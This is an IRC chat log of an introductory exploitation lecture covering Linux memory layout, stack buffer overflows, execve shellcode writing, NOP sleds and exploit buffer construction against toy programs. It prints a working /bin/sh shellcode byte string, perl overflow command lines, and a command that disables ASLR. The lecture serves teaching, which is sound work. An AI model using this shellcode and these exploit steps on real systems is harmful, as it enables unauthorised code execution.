May 07 21:12:04 nnp The focus of these lectures will be on finding and May 07 21:12:04 nnp exploiting vulnerabilities which can cause a security risk May 07 21:12:33 nnp The aim of the lectures is to bring a software exploitation newbie to the point where they can confidently discover and exploit new vulnerabilities and May 07 21:12:39 nnp also have the foundation of knowledge to continue with more advanced May 07 21:12:48 nnp techniques. May 07 21:13:07 nnp The first few lectures are going to be linux and open source specific. Once everyone is confident in these areas we'll then move onto exploiting closed source and MS Windows based software. May 07 21:13:21 nnp The aim of this first lecture is to get everyone on a common level of knowledge. We will be covering .... May 07 21:13:26 nnp 1) Linux memory structures May 07 21:13:30 nnp 2) Classic buffer overflows May 07 21:13:35 nnp 3) Basics of ShellCoding May 07 21:13:40 nnp 4) An introduction to debugging with GDB May 07 21:13:47 nnp 1.1 Linux Memory Structures May 07 21:14:21 nnp Before we can begin exploiting applications we need a basic knowledge of how they appear in memory. As many of you may know, programs have several different and distinct sections. These are the stack, heap, bss,data and code. Each of these sections has a specific use and all have different properties. May 07 21:14:33 nnp Code: Contains the code of the program (duh! ;) ). It is read only May 07 21:14:35 * Cyph3r (opera@bu-97721158.karoo.kcom.com) has joined #lecture May 07 21:14:37 nnp Data: The data section contains initialised global variables May 07 21:14:43 nnp BSS: The bss section contains uninitialised global variables May 07 21:14:49 nnp Heap: Used to store dynamically allocated variables (e.g via malloc() in May 07 21:14:55 nnp C or new in C++) May 07 21:15:14 nnp Stack: Used to store local variables,function arguments and data used in directing the flow of the application (it is herewe will be focusing our attentions for now) May 07 21:15:38 nnp The addresses available to your program start at 0x00000000 and grow towards a maximum e.g 0xbfffffff. May 07 21:15:58 nnp The heap grows from lower addresses towards higher ones and the stack starts at high memory addresses and grows downwards. Its very important to remember this and it can be quite confusing at first May 07 21:16:18 nnp For example. To make space for 8 bytes of local variables (i.e make the stack bigger) the instruction would look like May 07 21:16:25 nnp sub $0x8,%esp May 07 21:16:30 nnp not add $0x8, %esp as you might expect. May 07 21:16:51 nnp it looks something like this ...... May 07 21:17:07 nnp 0xffffffff ---stack -----> <----Unused memory -----> <-----Heap---- May 07 21:17:31 nnp One other source of confusion can be in what direction variables are put onto the stack. e.g if you have space reserved for a string of size 0x4 at 0xbffff484 it would start at 0xbffff484 and finish at 0xbffff487 not 0xbffff471. May 07 21:17:50 nnp i.e they still start at low and go to high even though the stack is growing in the opposite direction. Why is this good for us? May 07 21:18:18 nnp Well if we can make the string grow beyond the space we have reserved for it we will be overwriting and controlling previously stored variables as opposed to unused memory. May 07 21:18:26 * nnp sets mode -m #lecture May 07 21:18:30 nnp any questions so far? May 07 21:18:33 nnp am i going to slow? May 07 21:18:36 nnp or too fast? May 07 21:18:48 Cyph3r im getting you :) May 07 21:19:01 nnp k... May 07 21:19:08 * nnp sets mode +m #lecture May 07 21:19:22 nnp So what do I mean by 'direct the flow of the application'? First of all let me refresh your memories on some basic asm. May 07 21:19:45 nnp To keep track of what instruction the cpu should execute next a register called the EIP(Extended Instruction Pointer) is used....i.e if you can control this EIP then you can basically control what the cpu does May 07 21:19:52 nnp This will be our May 07 21:19:52 nnp aim. May 07 21:20:21 nnp when you make a function call (eg, strcpy(buf1, buf2)) the flow of execution jumps into the strcpy function May 07 21:20:34 nnp When this completes you must know where to continue May 07 21:20:44 nnp i.e the instruction directly after the call to strcpy May 07 21:20:52 nnp How does this magic occur? What happens is this: May 07 21:21:09 nnp The arguments to the function are pushed onto the stack. Just before the execution jumps to the strcpy function the current value of the EIP register is push'ed onto the stack May 07 21:21:18 nnp Then execution jumps to the strcpy function May 07 21:21:30 nnp The stack then looks somewhat like this..... May 07 21:21:35 nnp |dest | May 07 21:21:40 nnp |src | May 07 21:21:44 nnp |stored eip(return address) | <----ESP points here May 07 21:22:12 nnp In strcpy the EBP is push'ed onto the stack. (The EBP(extended base pointer) stores a reference point used to address both arguments and local variables) May 07 21:22:52 nnp The parameters are the start of the stack frame for that function. The stack frame contains the parameters,return information and the local variables May 07 21:23:14 nnp to the function in question and every function will have its own base. pointer) .Every invocation of a C function creates a new stack frame on the stack . May 07 21:23:17 * R4d30N (admin@31F8B797.6C483A91.B71335E7.IP) has joined #lecture May 07 21:23:31 nnp so once the function is entered the stack looks like this May 07 21:23:40 nnp |dest | May 07 21:23:41 nnp |src | May 07 21:23:45 nnp |stored eip | May 07 21:23:51 nnp |stored ebp | <----ESP points here May 07 21:24:14 nnp When the strcpy function is done it pop's the stored value of EBP and EIP into the EIP and EBP registers respectively then execution continues. May 07 21:24:23 * nnp sets mode -m #lecture May 07 21:24:30 nnp everyone still with me? May 07 21:24:37 nnp (sup r4d30n) May 07 21:24:53 * ellipsis has quit (Quit: Art + Programming = Insanity) May 07 21:24:57 R4d30N Aight man,said id stop by May 07 21:24:58 nnp i'll take that as a yes May 07 21:25:04 * nnp sets mode +m #lecture May 07 21:25:17 nnp This could happen many times e.g the strcpy function could call some other function and so on etc etc. May 07 21:25:28 nnp Its important to know how _exactly_ this happens and what the stack looks like so take a look at this code. May 07 21:25:50 nnp http://silenthack.co.uk/lectures/lecture1/stackex.txt May 07 21:26:15 nnp you can compile the above with May 07 21:26:24 nnp gcc -g -static -o lec11 lec11.c May 07 21:26:49 nnp Now to get a complete understanding we must look at the asm this C code compiles to. To do this we need a debugger and on linux the best availible is GDB. It is freely available and is included on most distros by default. May 07 21:26:57 * nnp sets mode -m #lecture May 07 21:27:05 nnp in case anyone has any immediate questions May 07 21:27:08 d03boy Question: Does each program get its own stack and heap and stuff? I'm used to working on motorola chips which dont have separate programs so you only have one stack. May 07 21:27:13 nnp yes May 07 21:27:20 nnp every program has its own sections May 07 21:27:28 nnp completely independent of each other May 07 21:27:45 nnp here is the disassembly of the above code May 07 21:28:04 nnp http://silenthack.co.uk/lectures/lecture1/disasstackex.txt May 07 21:28:27 nnp it also contains some comments to explain whats going on if your asm isnt so good May 07 21:29:01 nnp i should also mention now, gdb uses at&t syntax by default. to make it use intel syntax issue the command May 07 21:29:14 nnp set disassembly-flavor intel May 07 21:29:40 nnp any questions on that code? May 07 21:29:57 elmo_ Question: ``set disassembly-flavor intel`` do I do that as an argument while starting GDB or in a configuration file? May 07 21:30:17 nnp you can do it in a config file or just issue it from the gdb command line May 07 21:30:57 nnp ok...so on to shellcode May 07 21:31:04 nnp or at least the basics anyway May 07 21:31:28 nnp firstly if anyone is actually following this code and attempting it can i get you to check /proc/sys/kernel May 07 21:31:38 nnp for anything that looks like randomize_va_space May 07 21:31:51 nnp if you find it issue the following command echo 0 > /proc/sys/kerne/randomize_va_space May 07 21:32:00 nnp that will turn off stack randomization for now May 07 21:32:10 nnp after the lecture you can echo 1 back into that file May 07 21:32:32 nnp So, this brings us to the first of our many attacks. May 07 21:32:48 nnp You should see that if we can somehow change the stored eip to point to code that we control we can effectively do what we want May 07 21:33:12 nnp e.g if we could store the instructions system("/bin/sh") and then change the stored eip to point to it, instead of returning back into the main function a shell would be spawned. Cool, no? May 07 21:33:31 nnp So for our first real example we will just redirect the eip to some arbitary address just so you know im telling the truth ;) May 07 21:33:41 nnp look at the following code..... May 07 21:33:55 nnp http://silenthack.co.uk/lectures/lecture1/changeeip1.txt May 07 21:34:32 nnp as you can see from the comments if you attempt to run the above program it seg faults May 07 21:34:52 nnp why? well what the above code does is very simple. The int * i is a local variable May 07 21:34:58 nnp and therefore stored on the stack May 07 21:35:09 nnp So if you remember from earlier the stack would look like this May 07 21:35:14 nnp |stored eip| May 07 21:35:19 nnp |stored ebp| May 07 21:35:23 nnp |int * i | May 07 21:35:24 * Ch4r (Ch4r@bu-BBA3FD18.hsd1.ca.comcast.net) has joined #lecture May 07 21:35:24 * ChanServ sets mode +q #lecture Ch4r May 07 21:35:24 * ChanServ gives channel operator status to Ch4r May 07 21:35:41 Ch4r whoa, lots of p eople here? The lecture isn;t for another twenty minutes, right? May 07 21:35:49 nnp so we give i its own address and then add 2 to it. Since i is a pointer to an int adding two has the effect of increasing the address stored in it by 8 bytes May 07 21:35:56 nnp um, 9pm gmt? May 07 21:35:57 nnp no? May 07 21:36:02 Ch4r 9 PM GDT May 07 21:36:04 Ch4r err May 07 21:36:07 Ch4r 10 PM GDT May 07 21:36:10 nnp ? May 07 21:36:20 Ch4r 9 PM GMT, 10 PM GDT May 07 21:36:36 nnp yea....its 21:36 gmt now May 07 21:36:37 d03boy it started 37 minutes ago May 07 21:36:54 nnp isnt it? fuck, is it? May 07 21:37:09 elmo_ the time is right, go on May 07 21:37:16 nnp right oh.... May 07 21:37:37 nnp What's 8 bytes above i in memory? You got it, the stored eip. We put 0 in the address pointed to by i (the stored eip) and when May 07 21:37:47 nnp the program tries to use the stored eip to continue execution the value 0x0 is put into the eip May 07 21:38:02 nnp This address isnt executable and so the program segmentation faults. May 07 21:38:11 nnp Lets make this a little more useful. Lets spawn a shell. May 07 21:38:20 nnp One way of doing this is using the execve system call. May 07 21:38:30 nnp The problem with this is the cpu has no idea how to interpret C code May 07 21:38:38 Ch4r nnp: sorry, to interrupt, but.. http://odin.gi.alaska.edu/lumm/GMTclock/ ;/ May 07 21:38:58 nnp The cpu needs machine instructions. To get these instructions we write the code we need executed in some asm variant and then get the opcodes using a program such as objdump or hexedit. May 07 21:39:30 nnp ch4r: sorry about that May 07 21:39:49 nnp So....we need code to execute the system call. Pretty simple really. Shellcode is basically a sequence of asm May 07 21:39:59 nnp commands which usually spawn some form of shell(hence the name). May 07 21:39:59 Cyph3r well im in UK and its 9:39... May 07 21:40:21 nnp To do this we have to use system calls (as in calls to the system not the function system() from whatever C library you're using). May 07 21:40:32 nnp You can get the numbers of the various sytems calls from May 07 21:40:45 nnp execve() happens to be sys call 11. From the man page we can see that the execve call looks like this May 07 21:41:15 nnp (oh, forgot to say, in case you dont know the linux kernel and most others indentify sys calls via numbers not names) May 07 21:41:21 nnp int execve (const char *filename, char *const argv [], char *const envp[]); May 07 21:41:34 nnp argv is a null terminated list of the programs args (includes the program name) and envp can just be null for our purposes May 07 21:41:41 nnp the filename is the program we want to execute May 07 21:41:48 * elmo_ has quit (Ping timeout) May 07 21:42:00 * elmo_ (elmo@bu-3E871720.res.east.verizon.net) has joined #lecture May 07 21:42:01 nnp So we need to code a call to this in asm (nasm) and then get the instructions from this. Firstly, it usually helps to code up our shellcode in C so here is the 'classic' example May 07 21:42:22 nnp http://silenthack.co.uk/lectures/lecture1/shell1.txt May 07 21:42:50 nnp the nasm code follows it May 07 21:43:07 nnp there are a few intersting things in there May 07 21:43:30 nnp firstly the jmp at the start which goes to a call.... May 07 21:44:05 nnp the reason for this is that we need to be able to get the address of that buffer despite the fact we will have no idea (well, pretty much) where we will be on the stack May 07 21:44:11 * nivek (Ze@EB549BD8.2202F3B8.D10BF7C7.IP) has joined #lecture May 07 21:44:21 nnp the call instruction puts the return address (i.e where buf is) onto the stack May 07 21:44:30 nnp this is then pop'ed off into esi May 07 21:44:47 nnp this is used then as a base for the buffer May 07 21:45:12 nnp We can compile the previous code with the line May 07 21:45:15 nnp nasm -f elf shell.asm May 07 21:45:32 nnp To then attain the shellcode from this we disassemble the program using objdump -d shell.o May 07 21:45:53 nnp this gives the output http://silenthack.co.uk/lectures/lecture1/objdump1.txt May 07 21:46:16 elmo_ not found May 07 21:46:17 nnp hmm, broken link... May 07 21:46:18 nnp one sec May 07 21:47:55 nnp k, try now May 07 21:48:39 nnp The first column is the distance from the start in bytes. The second is the machine instruction and the final column is what objdump thinks the corresponding machine instructions are May 07 21:49:11 nnp What we will do is use the overflow to write the machine instructions back up the stack. By altering the eip to point to the start of this these instructions will then be executed May 07 21:49:22 nnp There are problems with the above instructions though, May 07 21:49:44 nnp you'll notice there are several sequences of 00 i.e null bytes. The problem with this is that the majority ofbasic buffer overflow vulnerabilities exist in string manipulation functions e.g strcpy. May 07 21:50:03 nnp When strcpy encounters a null byte it will stop copying, as it should, becuase it thinks it's encountering the end of the string. We will first need to remove these by substituting the May 07 21:50:08 nnp offending instructions with ones that don't generate null bytes May 07 21:50:15 nnp this results in the following code.... May 07 21:50:43 nnp http://silenthack.co.uk/lectures/lecture1/shell2.txt May 07 21:51:17 nnp hmm, there should be the following line at the start of that May 07 21:51:20 nnp segment .text May 07 21:51:32 nnp any questions regarding the optimisations in that? May 07 21:52:15 nnp We use objdump -d on the object file from the above code and then just copy out the machine instructions May 07 21:52:22 nnp that results in the following shellcode May 07 21:52:41 nnp \xeb\x1e\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\xb0\x01\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x46\x55\x55\x55\x55\x4b\x4b\x4b\x4b May 07 21:52:53 nnp I have added '\x' before each of the bytes so that C will interpret them as hex. May 07 21:53:12 nnp Now we need to execute the same C program as before but this time instead having the eip point to 0x0 it will point to our shellcode May 07 21:53:35 nnp http://silenthack.co.uk/lectures/lecture1/shell3.txt May 07 21:53:56 nnp and the result of running the above program is surprise, surprise...a shell :P May 07 21:53:57 d03boy can you convert that to ascii for us so we know what it says? May 07 21:54:28 nnp all that is is the result of me compiling http://silenthack.co.uk/lectures/lecture1/shell2.txt May 07 21:54:31 nnp that code there May 07 21:54:38 d03boy oh, gotcha May 07 21:54:39 nnp with nasm -f elf shell.asm May 07 21:54:49 nnp then running objdump -d shell.o May 07 21:54:56 nnp and from that parsing out the machine instructions May 07 21:55:11 nnp (the second column) May 07 21:55:27 nnp any other questions? May 07 21:55:50 nnp ok...so....onto the final section for tonight.....basic buffer overflows May 07 21:56:12 nnp We'll now explore how to gain control of the eip in an actual program May 07 21:56:19 nnp Consider the following code May 07 21:56:29 nnp char buf1[16]; May 07 21:56:31 nnp strcpy(buf1, argv[1]); May 07 21:56:53 nnp the aim of this code is to copy the first user provided argument into buf1 May 07 21:57:05 nnp But what happens if the user inputs more than 16 bytes? May 07 21:57:19 nnp Their input will overflow the end of buf1 and continue overwriting data previously stored on the stack. May 07 21:57:28 nnp Try it out May 07 21:57:34 nnp ./vuln1 `perl -e "print "A"x16;"` May 07 21:57:38 nnp That should run just fine May 07 21:57:44 nnp whereas.... May 07 21:57:48 nnp ./vuln1 `perl -e "print "A"x32;"` May 07 21:57:54 nnp should seg fault May 07 21:58:01 nnp The reason? We just filled the EIP with A's. May 07 21:58:10 nnp The char A is 0x41 and so our program tried to return to 0x41414141 May 07 21:58:21 nnp again not a valid address for execution May 07 21:58:51 nnp Now, we need to get a shell from this. We're going to do it first of all just using the command line. May 07 21:59:08 nnp So we store the shellcode from earlier as an environment variable May 07 21:59:16 nnp on linux this is done via the following command May 07 21:59:22 nnp export SHELLCODE="SHELLCODE" May 07 21:59:33 nnp where "shellcode" is our shellcode from earlier May 07 21:59:39 nnp We can then find the address of the shellcode using the following program. May 07 22:00:21 nnp k...one sec....my connection just went nuts May 07 22:00:36 nnp http://www.nostarch.com/extras/hacking/chap2/getenvaddr.c May 07 22:00:59 nnp the above code is a simple C program that uses getenv to find the address of an environment variable May 07 22:01:23 nnp There's something you should know about the address returned by this code though. It is specific to the environment of ./getenvaddr. May 07 22:01:39 nnp Where the shellcode is in memory will change with respect to the length of the program name you are running May 07 22:01:51 nnp For every character extra the program name has the shellcode will be located 2 bytes lower in memory and vice versa. May 07 22:02:18 nnp For example call our program vuln1 which is 6 characters shorter than getenvaddr. May 07 22:02:29 nnp It will therefore be located 0xC places behind it the address returned by getenvaddr May 07 22:02:44 nnp If you think about it this makes sense. The filename is also an environment variable for the running program and will therefore have an effect on where other environment variables are located. May 07 22:02:53 nnp Using this info we can exploit the program as follows May 07 22:03:16 nnp if getenvaddr returns the address 0xAABBCCDD May 07 22:03:28 nnp ./vuln1 `perl -e "print "AAAAAAAAAAAAAAAAAAAA\xDD\xCC\xBB\xAA";"` May 07 22:03:42 nnp The 4 bytes in the address must be reversed becuase the intel architecture uses little endian ordering May 07 22:03:55 nnp This is normally taken care of for us by the operating system but since we are writing directly onto the stack its up to us May 07 22:04:10 nnp Any questions? May 07 22:04:17 nnp (anyone even there :P ) May 07 22:04:28 d03boy ya May 07 22:04:31 l3thal ya May 07 22:04:36 qwertydawom no questions here May 07 22:04:39 nnp k, onwards then May 07 22:04:48 nnp how do we automate this kind of exploit? May 07 22:05:03 nnp Well we can use the execl() call to execute this program and pass in a crafted buffer as the argument. May 07 22:05:12 nnp For example, suppose the vulnerable call is as follows May 07 22:05:17 nnp char buffer[512]; May 07 22:05:21 nnp strcpy(buffer, argv[1]); May 07 22:05:26 nnp our crafted buffer would have to look something similar to the following May 07 22:05:40 nnp [516 - strlen(shellcode) of padding][shellcode][return address (start of shellcode)] May 07 22:05:58 * R4d30N has quit (Connection reset by peer) May 07 22:06:16 nnp As you can see, the above buffer would require us to get the return address exactly right, this could be quite difficult due to differences in compilers and what not. May 07 22:06:28 nnp We could brute force the address but on a remote system this would be less than ideal. May 07 22:06:39 nnp We have methods to increase our chances of success though. May 07 22:06:56 nnp One method is by using a NOP sled. A NOP is an asm instruction (\x90) that does nothing. May 07 22:07:28 nnp It is primarily used to waste cpu cycles for timing purposes but for us we can use it as a sort of fudge factor. May 07 22:07:53 nnp We put as many of these before the shellcode as we can fit (we also need other stuff so we cant fill it completely )and if we return anywhere within this sled the cpu will simply cycle May 07 22:07:59 nnp through them till it encounters the start of our shellcode. May 07 22:08:19 nnp We will also repeat the return address at the end of the buffer to ensure we overwrite the saved eip. May 07 22:08:35 nnp Sometimes it is hard to predict where exactly the stored eip will be due to compiler optimizations and padding. So our final buffer will look something like this May 07 22:08:41 nnp [200 or so NOPS][Shellcode][Repeated return address] May 07 22:09:18 nnp We will craft this using the following C code(lifted from The Art of Exploitation by Jon Erickson which was in turn lifted from Smashing the stack for fun and profit by aleph1) May 07 22:09:23 nnp ;) May 07 22:09:53 nnp http://silenthack.co.uk/lectures/lecture1/buffer.txt May 07 22:10:21 nnp k, i'll give ye a minute or two to look at that May 07 22:11:19 nnp k May 07 22:11:56 nnp As a side note, it is vital that your return address be aligned on a 4 byte boundary (i.e ensure the offset into the array where you start writing is divisable by 4) otherwise you will end up messing up overwriting the stored eip by misaligning the return address you are writing into it May 07 22:12:35 nnp One question many people have initially is regarding the sp() function above that returns the stack pointer for the current program and how could this address be used as the return address in the vulnerable program May 07 22:12:54 nnp The answer is that most programs have a very similar stack structure. This combined with the fudge factor provided by the NOPs is usually enough to land us somewhere in the NOP sled. May 07 22:13:26 nnp If it doesnt though you can simply pass an offset variable to the above program that will subtract this value from the address returned. This would be useful if the buffer we were overflowing was located further up the stack (lower in memory addresses) than our exploit buffer provided for. May 07 22:13:55 nnp Well that pretty much concludes this lecture. The aim was to lay the ground work for more advanced and more intersting material. In the next lecture I will cover more advanced techniques. May 07 22:14:10 nnp I would strongly recommend everyone have a read of aleph1's paper 'Smashing the Stack for Fun and Profit'.